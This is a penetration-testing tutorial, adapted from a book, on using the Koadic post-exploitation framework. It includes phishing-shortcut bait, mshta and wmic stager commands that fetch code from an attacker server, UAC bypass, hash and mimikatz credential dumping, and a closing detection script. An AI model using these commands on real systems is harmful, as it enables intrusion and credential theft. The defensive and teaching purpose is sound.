Koadic is a tool for penetration testing or internal vulnerability testing in your own Windows network.
The developers describe it as a command and control post-exploitation rootkit that uses either Windows Script Host, which is a COM-based runtime environment, or VBScript modules for its numerous attacks. It can be used for operating systems from Windows 2000 to Windows 10.
As is common with other postexploitation frameworks, Koadic requires a client-server environment that’s structured in a modular way. Those who have already used Metasploit or Empire will already know the procedure.
Installing the Server
You have two options to install Koadic. If you use the current version of Kali Linux, you can install Koadic directly via sudo apt install koadic. Alternatively, you can use the GitHub repository to install the latest version directly. To do this, you must run the following commands in the Linux terminal:
cd /opt
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
This way, you clone the repository to the /opt/koadic folder and then install the necessary dependencies via pip, the Python package manager.
If everything went through without any problem, a very spartan interface starts, showing the installed version and the number of modules present:
./koadic
~[ Version: 0xB ]~
~[ Stagers: 6 ]~
~[ Implants: 46 ]~
(koadic: sta/js/mshta)#
In the following sections, we assume that you use Koadic on Kali Linux. You need to adjust the sample paths as necessary. First, you should look at the autorun.example file in the Koadic directory. To do this, exit the server using the exit command and call the file with your favorite text editor:
set SRVPORT 9001
set ENDPOINT test123 # this will be the URL: /test123
run
Within this configuration file, important parameters are passed, which are executed at program start. In the example, the server port and the ENDPOINT URL have already been stored. Of course, you must adapt these to your test environment. You can find comprehensive documentation on the project website.
Very important parameters include, for example, CERTPATH and KEYPATH, which are used to include certificates for an encrypted connection between clients and server. You can call this configuration file with the --autorun parameter at Koadic program startup. However, for a first test you can also use the sample file. To do this, copy this file to autorun.cfg, for example, and start the server with the parameters set there:
(koadic: sta/js/mshta)# set SRVPORT 9001
[+] SRVPORT => 9001
(koadic: sta/js/mshta)# set ENDPOINT test123
[+] ENDPOINT => test123
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.171.105:9001/test123
[!] Don't edit this URL! (See: 'help portfwd')
[>] mshta http://192.168.171.105:9001/test123
(koadic: sta/js/mshta)#
As indicated in the warning, you shouldn’t change the URL now. This is the only way to ensure that clients can reach the server without problems.
Using Helper Tools in the Program
Before we present the other capabilities of Koadic, we want to describe some basic “helper tools” in the program. The help command provides tips everywhere in the environment regarding which commands are usable in the respective segment. Command-line completion via the Tab key helps you find your way around the environment and select possible parameters quickly. A single keystroke lists the available commands in the main menu, for example:
(koadic: sta/js/mshta)# <tab key>
? creds execute help kill options pyexec run sounds use
api domain exit info listeners portfwd quit sessions taco
verbose cmdshell edit exploit jobs load previous repeatjobs
set unset zombies
Creating Connections from a Client to the Server
The way a connection is created from the Windows client to the Koadic server is left to the ingenuity of the respective attacker or penetration tester. The general approach is illustrated by the following scenario; the approach corresponds to a classic spear phishing attack (see figure below):
- The attacker connects to the remote server via SSH.
- The attacker sends an email to the target from a seemingly trusted source.
- The file in the attachment is supposedly a PDF document, but it turns out to be a link file and creates a connection to the Koadic server via the link stored there.
So first you need bait to make the connection. To do this, you want to create an Offer.pdf.lnk file. For this purpose, you use a Windows 10 PC and create a shortcut on the desktop.
In the generated file, you need to adjust the listed fields to the following values:
Target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "Start-Process mshta http://192.168.171.105:9001/test123"
Start in: %SYSTEMROOT%\system32\WindowsPowershell\v1.0
This will call PowerShell and start a process that connects to the Koadic server. Here, mshta stands for Microsoft HTML Application host. The big advantage of this attack is that mshta.exe is part of every Windows installation and is signed by Microsoft. It can be used to execute code; in this case, it is passed the network address that was displayed when Koadic was started. This is how the takeover of the client begins.
Give your bait an enticing name. If you want, you can also set a different file icon. However, the selected icon should also be available later in the target system under the same file name; otherwise, it won’t be displayed there.
That’s all there is to it! You can now copy the link files to any target system in your test environment and test whether a connection to the server is established when they’re called.
Virus Protection and Obfuscate: Some antivirus programs have already registered Koadic as malware and included appropriate signatures. The developers are trying to counteract this and have introduced the obfuscate parameter for this purpose, which you may have noticed in the configuration file. Over time, more ways to hide the payload from these programs should be added. In the end, it will become a game of cat and mouse, in which sometimes one side and sometimes the other will gain the upper hand.
Creating a First Connection: Zombie 0
Once you run the link files on the target system, the incoming connection will be displayed as a zombie on the Koadic server. Numbering starts at zero. The zombies command can then be used to call up more information about the source IP address and the status of the connection; such a connection corresponds to a session in other frameworks:
[+] Zombie 0: Staging new connection (192.168.171.166)
[+] Zombie 0: WIN10PC\John @ WIN10PC -- Windows 10 Pro
(koadic: sta/js/mshta)# zombies
ID IP STATUS LAST SEEN
--- --------------- ------- -------------------
0 192.168.171.166 Alive 2019-09-13 16:52:12
The Modules of Koadic
As you’ve already seen in the first call of the Koadic server, the modules are divided into stagers and implants. Here, the stagers are primarily used to establish a connection from the client to the server. If no stager is selected, sta/js/mshta is used by default, which is also the most reliable one according to the developers. You can find out which stagers are included by using the listeners command:
(koadic: sta/js/mshta)# listeners
ID IP PORT TYPE
---- --------- ----- -------
0 192.168.171.105 9001 stager/js/mshta
If you want to use other stagers, you should specify them in the configuration file at program startup or select them via the use "Stagername" command. Here too, the run command is used to transfer the selection to the server. For example, if you want to use the Windows Management Instrumentation Command Line, you should enable the wmic stager:
(koadic: sta/js/mshta)# use stager/js/wmic
(koadic: sta/js/wmic)# run
[+] Spawned a stager at http://192.168.171.105:9996/YH0O8.xsl
[!] Don't edit this URL! (See: 'help portfwd')
[>] wmic os get /FORMAT:"http://192.168.171.105:9996/YH0O8.xsl"
(koadic: sta/js/wmic)# listeners
ID IP PORT TYPE
---- --------- ----- -------
0 192.168.171.105 9001 stager/js/mshta
1 192.168.171.105 9996 stager/js/wmic
Implants are most comparable to the post modules in the Empire framework. They are transferred to the target systems via the existing zombie connections to do their work. In this process, when an implant is executed, the Koadic server creates a work order called a job.
The individual implants are divided into categories that you use in the various stages of postexploitation. Thus, in the directories you will find modules for elevation, gathering, managing, persistence, pivoting, scanning, and other tools.
A brief overview of the various implants can be found on the developers’ GitHub page. However, you can also use the use command and (Tab) to navigate through the menu structure:
(koadic: sta/js/wmic)# use implant/[TAB]
elevate/ fun/ gather/ inject/ manage/ persist/
phish/ pivot/ scan/ util/
(koadic: sta/js/wmic)# use implant/gather/[TAB]
clipboard enum_printers enum_users hashdump_sam
office_key windows_key
enum_domain_info enum_shares hashdump_dc loot_finder
user_hunter
(koadic: sta/js/wmic)# use implant/gather/clipboard
(koadic: imp/gat/clipboard)# info
NAME VALUE REQ DESCRIPTION
----- ---------- ---- -------------
ZOMBIE ALL yes the zombie to target
The info command then lists the necessary parameters for the selected module. In this example, the clipboard is to be read from all target systems. The ALL parameter is set by default. However, you can also select only certain zombie connections using the set command. Using run, you finally execute the selected module:
(koadic: imp/gat/clipboard)# set ZOMBIE 0
[+] ZOMBIE => 0
(koadic: imp/gat/clipboard)# run
[*] Zombie 0: Job 1 (implant/gather/clipboard) created.
[+] Zombie 0: Job 1 (implant/gather/clipboard) completed.
Clipboard contents: Secret1234
Extending Rights and Reading Password Hashes
Koadic is an incredibly versatile tool that we can’t describe in detail here. However, we would like to explain the general mode of operation by means of a rights escalation and the reading of password hashes or passwords.
We assume that the file Offer.pdf.lnk was launched on two PCs with user rights. The first PC runs Windows 7, the second Windows 10. Thus, zombie connections 0 and 1 were created on the Koadic server:
(koadic: imp/ele/bypassuac_fodhelper)# zombies
ID IP STATUS LAST SEEN
-- --------------- ------ -------------------
0 192.168.171.166 Alive 2019-09-14 11:05:26
1 192.168.171.230 Alive 2019-09-14 11:05:26
You now want to obtain administrator rights on both computers. For this purpose, Koadic provides various modules in the elevate subdirectory. For Windows 10, you can use implant/elevate/bypassuac_fodhelper and get the necessary parameters with the info command:
(koadic: sta/js/mshta)# use implant/elevate/bypassuac_fodhelper
(koadic: imp/ele/bypassuac_fodhelper)# info
NAME VALUE REQ DESCRIPTION
PAYLOAD yes run listeners for a list of IDs
ZOMBIE ALL yes the zombie to target
In this context, the term PAYLOAD is a bit confusing: it denotes the ID of the stager Koadic should use. You’ve already output the stagers via the listeners command. As a rule, it’s sufficient here to set the value to 0. On the other hand, we do not recommend leaving the parameter for the zombie connection set to ALL; instead, we recommend specifying the applicable ID in each case.
Once you’ve entered everything using set, you can instruct Koadic to run the module using run. This creates a job and outputs further information. If the attack was successful, another zombie should be displayed. The asterisk (*) after the ID indicates that this connection now has administrator rights.
Now you can proceed in the same way for the Windows 7 PC. However, here you need the implant/elevate/bypassuac_eventvwr module.
With this, you’ll get two new connections:
(koadic: imp/ele/bypassuac_eventvwr)# zombies
ID IP STATUS LAST SEEN
-- --------------- ------ -------------------
0 192.168.171.166 Alive 2019-09-14 11:07:07
1 192.168.171.230 Alive 2019-09-14 11:07:07
2* 192.168.171.166 Alive 2019-09-14 11:07:07
3* 192.168.171.230 Alive 2019-09-14 11:07:07
Now you’ve fulfilled the requirements to read the passwords or hash values in the target systems. Koadic provides the necessary modules in the gather or inject directories.
Use the implant/gather/hashdump_sam module to read password hashes on Windows 10. You can leave the preset parameters and only need to enter the zombie ID. However, make sure that you select the correct connection with administrator rights (2* in the example). Otherwise, the attempt will fail because you do not have sufficient rights.
For Windows 7, you must use the implant/inject/mimikatz_dotnet2js module in the same way. This way, with a little luck, you’ll also obtain the login passwords in plain text. The creds command lists the results:
Cred ID  IP               USERNAME + DOMAIN            PASSWORD    NTLM
-------  ---------------  ---------------------------  ----------  --------------------------------
0        192.168.171.230  John WIN7CLIENT              Secret1234  4ceb37c54b65aabf5abd537c6d285123
5        192.168.171.166  WDAGUtilityAccount WIN10PC               e3c560b7ff401f8456c69001aa42d979
6        192.168.171.166  Win10PC WIN10PC                          c02de0449053f00a6df2ff9177f294ca
7        192.168.171.166  John WIN10PC                             3ec82c448595c1a415b550e1b0c6ec68
Conclusion and Countermeasures
Koadic is a postexploitation framework that is in the early stages of development, but it already comes with many useful modules. It remains to be seen what tricks the developers can incorporate to make it harder for antivirus programs to find the payloads. Because most of the zombie connections are unwanted connections to the internet, a firewall combined with a proxy server equipped with user authentication helps as a countermeasure.
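The countermeasure above works on the network side. On the endpoint, the two stager invocations this article shows leave recognizable traces in process-creation telemetry: mshta.exe launched with a URL as its argument (the default stager from Creating Connections from a Client to the Server), mshta.exe spawned by PowerShell from the shortcut bait, and wmic.exe pulling a stylesheet from a remote URL (the wmic stager from The Modules of Koadic). The following Python script is an added example written for this article; it is not part of Koadic or of the book. It runs a few simple rules over constructed process-creation records whose field names (host, user, parent, image, cmdline) are modelled on Sysmon Event ID 1 and are an assumption of the example, and it collects the host:port values the flagged command lines contact so they can be handed to the proxy or firewall mentioned above.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed sample process-creation events (field names modelled loosely on
# Sysmon Event ID 1; hosts, users and parent paths are made up for this example).
# The command lines reproduce the stager invocations the article shows.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WIN10PC", "user": "WIN10PC\\John", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell.exe "Start-Process mshta http://192.168.171.105:9001/test123"'},
    {"host": "WIN10PC", "user": "WIN10PC\\John",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta http://192.168.171.105:9001/test123"},
    {"host": "WIN7CLIENT", "user": "WIN7CLIENT\\John", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": 'wmic os get /FORMAT:"http://192.168.171.105:9996/YH0O8.xsl"'},
    # Two benign look-alikes that must not fire: a local HTA and a built-in format name.
    {"host": "WIN10PC", "user": "WIN10PC\\John", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": 'mshta.exe "C:\\Program Files\\Vendor\\setup.hta"'},
    {"host": "WIN10PC", "user": "NT AUTHORITY\\SYSTEM", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic os get /FORMAT:list"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# /FORMAT: followed (optionally after a quote) by a URL or a UNC path: a remote stylesheet.
REMOTE_XSL_RE = re.compile(r"/FORMAT:\s*\"?\s*(https?://|\\\\)", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of an image or parent path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    image = image_name(event["image"])
    parent = image_name(event["parent"])
    cmd = event["cmdline"]
    hits: List[str] = []
    # Default stager: mshta http://<server>:<port>/<endpoint>
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")
    # Shortcut bait: PowerShell is the parent of mshta.exe
    if image == "mshta.exe" and parent == "powershell.exe":
        hits.append("mshta_child_of_powershell")
    if image == "powershell.exe" and re.search(r"start-process\s+mshta", cmd, re.IGNORECASE):
        hits.append("powershell_starts_mshta")
    # wmic stager: wmic os get /FORMAT:"http://<server>:<port>/<name>.xsl"
    if image == "wmic.exe" and REMOTE_XSL_RE.search(cmd):
        hits.append("wmic_remote_xsl")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over all events and return only the ones that matched."""
    alerts: List[Dict[str, object]] = []
    for event in events:
        hits = classify(event)
        if hits:
            alerts.append({**event, "rules": hits})
    return alerts


def stager_endpoints(events: List[Dict[str, str]]) -> Set[str]:
    """host:port of every URL in a flagged command line, for a proxy/firewall block list."""
    endpoints: Set[str] = set()
    for alert in scan(events):
        for url in URL_RE.findall(str(alert["cmdline"])):
            endpoints.add(urlparse(url).netloc)
    return endpoints


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']}: {', '.join(alert['rules'])} :: {alert['cmdline']}")
    print("Stager endpoints to block:", sorted(stager_endpoints(SAMPLE_EVENTS)))
```

The rules deliberately key on the combination of a signed system binary and a remote argument rather than on the binary alone, because mshta.exe and wmic.exe have legitimate local uses; the two benign records in the sample show the difference. In a real deployment the same logic would run against the SIEM's process-creation stream, and the collected endpoints would feed the authenticating proxy's deny list.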
Editor’s note: This post has been adapted from a section of the book Hacking and Security: The Comprehensive Guide to Penetration Testing and Cybersecurity by Michael Kofler, Klaus Gebeshuber, Peter Kloep, Frank Neugebauer, André Zingsheim, Thomas Hackner, Markus Widl, Roland Aigner, Stefan Kania, Tobias Scheible, and Matthias Wübbeling.